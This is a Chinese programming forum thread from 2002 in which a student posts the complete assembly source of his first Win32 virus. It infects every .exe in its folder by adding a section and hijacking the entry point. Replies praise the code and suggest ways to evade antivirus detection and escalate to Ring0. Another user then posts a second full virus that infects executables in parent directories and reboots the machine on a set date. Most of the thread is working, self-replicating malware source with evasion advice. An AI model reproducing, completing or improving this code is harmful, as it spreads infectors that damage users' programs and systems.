第一個程序就是一個病毒
這是我第一次用assembler language寫程序,呵呵!第一個程序就是一個病毒。很簡單,所以很多地方都問題不少。請大家看看,有什麽意見儘管提,如果我能從中學到東東,一定給分。另外,病毒也是程序,我寫病毒只是爲了學習彙編語言,提高自己的水平,並非進行破壞。
因爲對ASM以前還沒用過,所以請各位高手指點。願意和每一個學習彙編的中國人一起攜手共進,為祖國軟件業爭口氣!我的qq:77853179。願意交個朋友一起學彙編的就加我吧。
以下是源代碼,不知道我現在在xp下如何像98一樣進入Ring0。誰知道告訴我!
倒!他說帖子太長了,沒法發:(
誰要就留下E-MAIL,我發給他源代碼,不過要記得給我提建議哦! :)
1 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 08:57:19 得分 0
; ******************************************************************************
; * My Program Information *
; ******************************************************************************
; * *
; * Designer : ShaoXiaosheng Place : Minhang Shanghai China *
; * Program Name : SleepingChild *
; * Version Now : 0.1 *
; * Create Date : 2002-2-17 Modify Date : 2002-2-18 *
; * *
; * Microsoft (R) Macro Assembler: Version 6.15.9030 *
; * Microsoft (R) Incremental Linker: Version 7.00.9030 *
; * *
; * EditPlus Text Editor: Version 2.10c *
; * *
; *============================================================================*
; * History *
; *============================================================================*
; * Version 0.1 *
; *============================================================================*
; * No history before. I feel very happy! This is my first virus. Also the *
; * first program use assembler. :) *
; * It is very easy! Only to infect all EXE file with it in the same *
; * directory. Not reside in memory! So it isn't very dangerous. The EXE file *
; * which was infect would show a message box. It doesn't rewrite the infected*
; * file. *
; ******************************************************************************
.386P
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
.data ;initialized data here
MsgBoxCaption2 db "SleepingChild",0
MsgBoxText2 db "Finished! (:",0
DllName1 db "KERNEL32.dll",0
DllName2 db "USER32.dll",0
FunctionName1 db "CreateFileA",0
FunctionName2 db "SetFilePointer",0
FunctionName3 db "ReadFile",0
FunctionName4 db "WriteFile",0
FunctionName5 db "CloseHandle",0
FunctionName6 db "FindFirstFileA",0
FunctionName7 db "FindNextFileA",0
FunctionName8 db "FindClose",0
FunctionName9 db "SetFileAttributesA",0
FunctionName10 db "MessageBoxA",0
.data? ;uninitialized data here
hLib HANDLE ?
.const ;constants here
.code ;here begins my code
; Show message
invoke MessageBox, NULL, addr MsgBoxText2, addr MsgBoxCaption2, MB_OK
invoke FreeLibrary, hLib
; Quit program
invoke ExitProcess, NULL
crazy segment
start:
mov OldoffsetOfEntryPiont, 00001000h
mov OldImageBase, 00400000h
;****************************
;| To get function address. |
;****************************
invoke LoadLibrary, addr DllName1
mov hLib, eax
invoke GetProcAddress, hLib, addr FunctionName1
mov myCreateFile, eax
invoke GetProcAddress, hLib, addr FunctionName2
mov mySetFilePointer, eax
invoke GetProcAddress, hLib, addr FunctionName3
mov myReadFile, eax
invoke GetProcAddress, hLib, addr FunctionName4
mov myWriteFile, eax
invoke GetProcAddress, hLib, addr FunctionName5
mov myCloseHandle, eax
invoke GetProcAddress, hLib, addr FunctionName6
mov myFindFirstFile, eax
invoke GetProcAddress, hLib, addr FunctionName7
mov myFindNextFile, eax
invoke GetProcAddress, hLib, addr FunctionName8
mov myFindClose, eax
invoke GetProcAddress, hLib, addr FunctionName9
mov mySetFileAttributes, eax
invoke LoadLibrary, addr DllName2
mov hLib, eax
invoke GetProcAddress, hLib, addr FunctionName10
mov myMessageBox, eax
v_start:
call game_start
game_start:
pop ebp ; get the present offsetess of "game_start".
sub ebp, offset game_start ; get the remainder between the offsetess
; of "game_start" and offset of it.
mov eax, OldImageBase[ebp]
mov PresentImageBase[ebp], eax
mov eax, OldoffsetOfEntryPiont[ebp]
mov PresentoffsetOfEntryPiont[ebp], eax
; Begin to find the first file.
lea eax, lpFindFileData[ebp]
push eax
lea eax, lpFileName[ebp]
push eax
call myFindFirstFile[ebp]
.if eax==INVALID_HANDLE_VALUE
jmp FindFileEnd
.endif
mov hFind[ebp], eax
Operate:
; To set the attributes of the finded file.
push FILE_ATTRIBUTE_NORMAL
lea eax, lpFindFileData[ebp].cFileName
push eax
call mySetFileAttributes[ebp]
; To open the finded file for operating
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_ALWAYS
push NULL
push FILE_SHARE_WRITE
push GENERIC_WRITE or GENERIC_READ
lea eax, lpFindFileData[ebp].cFileName
push eax
call myCreateFile[ebp]
.if eax==INVALID_HANDLE_VALUE
jmp error
.endif
mov hFile[ebp], eax
; If the word value at offset 18h is 40h or greater, the word value at 3ch is typically
; an offset to a Windows header.
push FILE_BEGIN
push NULL
push 18h
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 1
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]Top
2 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 08:57:59 得分 0
.if lpBuffer[ebp]<40h
jmp exit
.endif
; Infected or not?
push FILE_BEGIN
push NULL
push 38h
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax,BytesRead[ebp]
push eax
push 3
lea eax,lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
.if lpBuffer[ebp]=='Sxs'
jmp infected
.endif
; To move the file pointer to the offsetess where the value of offsetess of PE header is
push FILE_BEGIN
push NULL
push 3ch
push hFile[ebp]
call mySetFilePointer[ebp]
; To read the opened file to get the offsetess of PE header
push NULL
lea eax,BytesRead[ebp]
push eax
push 4
lea eax,PE_sig_offset[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To move the pointer to PE header
push FILE_BEGIN
push NULL
push PE_sig_offset[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
; To read the PE header. If this isn't a real PE, exit.
push NULL
lea eax,BytesRead[ebp]
push eax
push 4
lea eax,PE_signature[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
.if PE_signature[ebp]!=4550h
jmp exit
.endif
;******************************************
;| At first, I'll get some useful values. |
;******************************************
; To get the number of sections
push FILE_CURRENT
push NULL
push 2
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax,BytesRead[ebp]
push eax
push 2
lea eax,NumberOfSections[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To get the size of optinal header
push FILE_CURRENT
push NULL
push 12
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 2
lea eax,SizeOfOptionalHeader[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To judge the Magic mumber. If the image isn't PE32, then exit.
push FILE_CURRENT
push NULL
push 2
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 2
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
.if lpBuffer[ebp]!=010bh
jmp exit
.endif
; To get the offset of the entry point
push FILE_CURRENT
push NULL
push 14
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, offsetOfEntryPiont[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
mov eax, offsetOfEntryPiont[ebp]
mov OldoffsetOfEntryPiont[ebp], eax
; To get the image base
push FILE_CURRENT
push NULL
push 8
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, ImageBase[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
mov eax, ImageBase[ebp]
mov OldImageBase[ebp], eax
; To get the section alignment
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, SectionAlignment[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To get the file alignment
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, FileAlignment[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
; To get the size of image
push FILE_CURRENT
push NULL
push 16
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, SizeOfImage[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
mov eax, SizeOfImage[ebp]
mov offsetOfEntryPiont[ebp], eax ;new offsetOfEntryPiont==old SizeOfImage
; To get the size of headers
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, SizeOfHeaders[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]Top
3 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 08:58:32 得分 0
;****************************************************************************************
;| Caculate the room for the new section header. If there is not enoughroom, then |
;| exit. The size of section header is 28h. The amount size ofPE signature and COFF |
;| file header is 18h. |
;| room=SizeOfHeaders-[(NumberOfSections+1)*28h+SizeOfOptionalHeader+18h+PE_sig_offset] |
;****************************************************************************************
mov ecx, 28h
mov eax, NumberOfSections[ebp]
mul ecx
add eax, 18h
add eax, PE_sig_offset[ebp]
add eax, SizeOfOptionalHeader[ebp]
push eax
add eax, 28h
.if eax > SizeOfHeaders[ebp]
jmp exit
.endif
;***********************************************
;| Now begin to create the new section header. |
;***********************************************
;| First modify the number of sections |
;***********************************************
mov eax, NumberOfSections[ebp]
inc eax
mov NumberOfSections[ebp], eax
mov eax, PE_sig_offset[ebp]
add eax, 6
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 2
lea eax, NumberOfSections[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
;****************
;| Second create|
;****************
; Name
pop eax
push eax
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 8
lea eax, SectionName[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; VirtualSize
mov VirtualSize[ebp], offset v_end-offset v_start
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, VirtualSize[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; Virtualoffsetess==new offsetessOfEntryPiont==old SizeOfImage
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, SizeOfImage[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; SizeOfRawData
mov eax, VirtualSize[ebp]
xor edx, edx
mov ecx, FileAlignment[ebp]
div ecx
inc eax
mul FileAlignment[ebp]
mov lpBuffer[ebp], eax
mov SizeOfRawData[ebp], eax
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; PointToRawData
sub NumberOfSections[ebp], 2
mov eax, NumberOfSections[ebp]
mov ecx, 28h
mul ecx
mov edx, 18h
add edx, PE_sig_offset[ebp]
add edx, SizeOfOptionalHeader[ebp]
add eax, edx
add eax, 16
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
push lpBuffer[ebp]
push NULL
lea eax, BytesRead[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myReadFile[ebp]
pop eax
add eax, lpBuffer[ebp]
mov BytesRead[ebp],eax
pop lpBuffer[ebp]
push BytesRead[ebp]
add lpBuffer[ebp], 20
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, BytesRead[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
; Characteristics
push FILE_CURRENT
push NULL
push 12
push hFile[ebp]
call mySetFilePointer[ebp]
mov lpBuffer[ebp], 0E0000020h ; Make the setction readable, writeable, code, executable
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, lpBuffer[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
;************************************************
;| Modify offsetessOfEntryPiont and SizeOfImage |
;************************************************
mov ecx, SectionAlignment[ebp]
mov eax, VirtualSize[ebp]
xor edx, edx
div ecx
inc eax
mul ecx
mov ebx, SizeOfImage[ebp]
add SizeOfImage[ebp], eax
mov eax, 18h
add eax, PE_sig_offset[ebp]
add eax, 16
mov lpBuffer[ebp], eax
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax,offsetOfEntryPiont[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
push FILE_CURRENT
push NULL
push 36
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 4
lea eax, SizeOfImage[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
;***************************************************
;| Everything seems very easy :) |
;| Now let's write the code into the operated file |
;***************************************************
pop lpBuffer[ebp]
push FILE_BEGIN
push NULL
push lpBuffer[ebp]
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push SizeOfRawData[ebp]
lea eax, v_start[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]Top
4 楼Ring0(邵曉盛)回复于 2002-02-19 09:00:22 得分 0
;*************************************
;| Ha!Ha! :) Write the infected mark |
;*************************************
push FILE_BEGIN
push NULL
push 38h
push hFile[ebp]
call mySetFilePointer[ebp]
push NULL
lea eax, BytesWrote[ebp]
push eax
push 3
lea eax, InfectedMark[ebp]
push eax
push hFile[ebp]
call myWriteFile[ebp]
infected:
exit:
; To close the file handle
push hFile[ebp]
call myCloseHandle[ebp]
error:
;*******************************************************
;| One file has infected. Now begin to find next file. |
;*******************************************************
lea eax, lpFindFileData[ebp]
push eax
push hFind[ebp]
call myFindNextFile[ebp]
.if eax!=0
jmp Operate
.endif
FindFileEnd:
;**************************
;| OK! Stop finding file. |
;**************************
push hFind[ebp]
call myFindClose[ebp]
;*******************
;| Okay! Finished! |
;*******************
; Symptom
push MB_OK
lea eax, MsgBoxCaption[ebp]
push eax
lea eax, MsgBoxText[ebp]
push eax
push NULL
call myMessageBox[ebp]
;return
mov eax, PresentoffsetOfEntryPiont[ebp]
add eax, PresentImageBase[ebp]
push eax
ret
;********
;| data |
;********
MsgBoxCaption db "SleepingChild",0
MsgBoxText db "PE ATTACKED! (:",0
lpFileName db "*.exe",0
SectionName db "19840209",0
InfectedMark db "Sxs",0
hFind HANDLE 0
hFile HANDLE 0
lpFindFileData WIN32_FIND_DATA <0>
lpBuffer dd 0
BytesRead dd 0
BytesWrote dd 0
PE_sig_offset dd 0
PE_signature dd 0
NumberOfSections dd 0
SizeOfOptionalHeader dd 0
offsetOfEntryPiont dd 0
ImageBase dd 0
SectionAlignment dd 0
FileAlignment dd 0
SizeOfImage dd 0
SizeOfHeaders dd 0
VirtualSize dd 0
SizeOfRawData dd 0
OldoffsetOfEntryPiont dd 0
OldImageBase dd 0
PresentoffsetOfEntryPiont dd 0
PresentImageBase dd 0
myCreateFile dd 0
mySetFilePointer dd 0
myReadFile dd 0
myWriteFile dd 0
myCloseHandle dd 0
myMessageBox dd 0
myFindFirstFile dd 0
myFindNextFile dd 0
myFindClose dd 0
mySetFileAttributes dd 0
v_end:
crazy ends
end startTop
5 楼Ring0(邵曉盛)回复于 2002-02-19 09:01:52 得分 0
好了,以上是源程序,總算貼出來了!:)
6 楼zycat2002(展姚)回复于 2002-02-19 13:18:40 得分 0
不错嘛!!可惜编译出来后,在杀毒软件的虚拟机里被查了出来...
报告说该程序试图修改其他程序,对了建议你过滤一下windows2000/xp下的保护文件,别让人在windows2000下看见那个出错对话框...
再加上过滤杀毒软件程序的功能(避免那种报告!!!)
如果可以的话,还应对SEH进行修改,避免感染失败后的出错对话框
......
太多了
我的地址是zycat1986.9.4@163.com
我很想知道在XP下利用ring3方法进入ring0的一些方法
7 楼netter_bj(问题男孩)回复于 2002-02-19 14:26:35 得分 0
嘿嘿,,我的EMAIL
netter_3@yeah.net
8 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 15:25:57 得分 0
To: zycat2002(展姚)
多謝,我現在正在研究SEH
9 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 15:27:46 得分 0
是不是用FileMapping效果會更好?(速度方面)
10 楼awinder(风)回复于 2002-02-19 15:31:13 得分 10
写的挺好,标准的win32病毒,可以用作教程了。:)
不过要想实用还要多努力,起码不能让杀毒软件查出来吧。
http://cn.geocities.com/cntsu00/
有2000下ring0的方法,你可以参考一下。
11 楼Sleeping_Child(邵曉盛)回复于 2002-02-19 15:36:14 得分 0
謝謝鼓勵!:)哈哈!我會努力的。不過快考大學了,忙!:(
沒錯,起码不能让杀毒软件查出来,不過我還不精通彙編,剛剛開始,我有信心!:)
以後寫一些為大家服務的程序。
12 楼zycat2002(展姚)回复于 2002-02-19 18:52:34 得分 10
to Sleeping_Child
如果你觉得想提高自己的水平,就到Www.virusinc.com去注册一个账号,成为
真正的病毒编写人员。
或者找我的朋友苏睿暄(suruixuan1@sina.com),他可以给我点面子
帮帮你......
13 楼vBin(彬)回复于 2002-02-19 22:40:00 得分 15
个人意见:
可以利用病毒知识编写一些比较好用的软件
毕竟病毒不适合发布(起码不敢明着发)
若变成好用的软件岂不妙哉?
而且做成的软件,有些方面还要比病毒考虑的全一些呢。
我就利用做病毒的方法做了一个EXE文件合并器,支持Win32系统。
你也可以尝试一下,做一些类似的软件。
我发现这样的软件挺少的,即使有,也大多是国外的,或者含金量不高。
加油,支持国产软件。
14 楼Sleeping_Child(邵曉盛)回复于 2002-02-21 08:33:42 得分 0
嗯!vBin(彬) 說的有道理,我贊成!
同樣謝謝zycat2002(展姚) 的意見。
:)
問一下zycat2002(展姚) :我的防火墻爲什麽沒法找出這個病毒?
我用的是norton和金山毒霸
15 楼Sleeping_Child(邵曉盛)回复于 2002-02-21 08:38:56 得分 0
To:zycat2002(展姚)
那個網站要錢的!:(
16 楼atm2001(松鼠)回复于 2002-02-21 15:11:10 得分 0
不要钱的网站,会有精品吗?
17 楼atm2001(松鼠)回复于 2002-02-21 15:16:43 得分 0
zycat2002(展姚)说的杀毒软件是病毒检测机,是给专业反病毒人员用,
一般情况下你是找不到的,在下就是苏睿暄
18 楼Sleeping_Child(邵曉盛)回复于 2002-02-21 15:51:34 得分 0
嗯!我知道,在csdn上我看到過你給人家的回復,知道你是高手。是嗎?深奧,不過虛擬机倒聽到過。
19 楼atm2001(松鼠)回复于 2002-02-21 16:26:58 得分 15
这是我的第一个病毒(不是我的第一个程序,我的第一个程序是杀病毒的)
.386
.model flat
locals
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC
.DATA
TituloVentana db 'WIN32.First by 苏睿暄',0
TextoVentana db 'made in china',0
MemHandle dd 0
Victimas db '*.EXE',0
SearcHandle dd 0
Longitud dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
Hallado db 200 dup (0)
Crear db 200 dup (0)
ParaCorrer db 200 dup (0)
Original db 200 dup (0)
Actual db 200 dup (0)
PuntoPunto db '..',0
SystemTimeStruc dw 0,0,0,0,0,0,0,0
.CODE
BORGES: mov eax,offset SystemTimeStruc
push eax
call GetSystemTime
mov ax,word ptr offset [SystemTimeStruc+2]
cmp al,9
jne NoFQVbirthday
mov ax,word ptr offset [SystemTimeStruc+6]
cmp al,17
je Adios
NoFQVbirthday:
push offset Original
push 000000C8h
call GetCurrentDirectoryA
mov dword ptr [Longitud],eax
call GetCommandLineA
push eax
push offset ParaCorrer
call lstrcpyA
mov edi,eax
Buscar: cmp byte ptr [edi],'.'
jz ElPunto
inc edi
jmp Buscar
ElPunto:mov esi,edi
inc esi
add edi,4
mov byte ptr [edi],00
Carrousell:
call InfectDirectory
push offset PuntoPunto
call SetCurrentDirectoryA
push offset Actual
push 000000C8h
call GetCurrentDirectoryA
cmp eax,dword ptr [Longitud]
je Salida
mov dword ptr [Longitud],eax
jmp Carrousell
InfectDirectory:
push offset Win32FindData
push offset Victimas
call FindFirstFileA
mov dword ptr [SearcHandle],eax
Ciclo: cmp eax,-1
je Salida
or eax,eax
jnz Continuar
ret
Continuar:
push offset Hallado
push offset Crear
call lstrcpyA
mov edi,offset Crear
SeguirBuscando:
cmp byte ptr [edi],'.'
jz PuntoEncontrado
inc edi
jmp SeguirBuscando
PuntoEncontrado:
inc edi
mov dword ptr [edi],0004d4f43h
push offset Crear
push offset Hallado
call MoveFileA
push 0
push offset Hallado
push offset ParaCorrer+1
call CopyFileA
push offset Win32FindData
push dword ptr [SearcHandle]
call FindNextFileA
jmp Ciclo
FillClipboard:
push 0
call OpenClipboard
call EmptyClipboard
push (offset TextoVentana-offset TituloVentana)
push 00000002 ; GMEM_MOVEABLE
call GlobalAlloc
push eax
mov dword ptr [MemHandle],eax
call GlobalLock
push eax
push offset TituloVentana
push eax
call lstrcpyA
call GlobalUnlock
push dword ptr [MemHandle]
push 00000001 ; CF_TEXT
call SetClipboardData
call CloseClipboard
jmp Run4theNight
Adios: push 00000001
push offset TituloVentana
push offset TextoVentana
push 0
call MessageBoxA
push 0
push 00000002 ; EWX_REBOOT
call ExitWindowsEx
Salida: push offset Original
call SetCurrentDirectoryA
mov ax,word ptr offset [SystemTimeStruc+4]
cmp al,2
je FillClipboard
Run4theNight:
push offset ProcessInfo
push offset StartupInfo
sub eax,eax
push eax
push eax
push 00000010h
push eax
push eax
push eax
call GetCommandLineA
inc eax
push eax
Done: mov dword ptr [esi],0004d4f43h
push offset ParaCorrer+1
call CreateProcessA
push 0
call ExitProcess
Ends
End BORGESTop
20 楼Sleeping_Child(邵曉盛)回复于 2002-02-22 14:24:35 得分 0
哇!你搞過反病毒的嗎?我沒學過dos下的彙編。好,我學習一下你的代碼,謝謝!
21 楼ckhitler(ckhitler)回复于 2002-02-22 14:46:29 得分 0
这么年轻就有如此的功力,真让人羡慕,不过好像能用反病毒软件查出来,好好完善一下,祝你高考成功,考一所好大学,这里的兄弟支持你。一起努力吧。




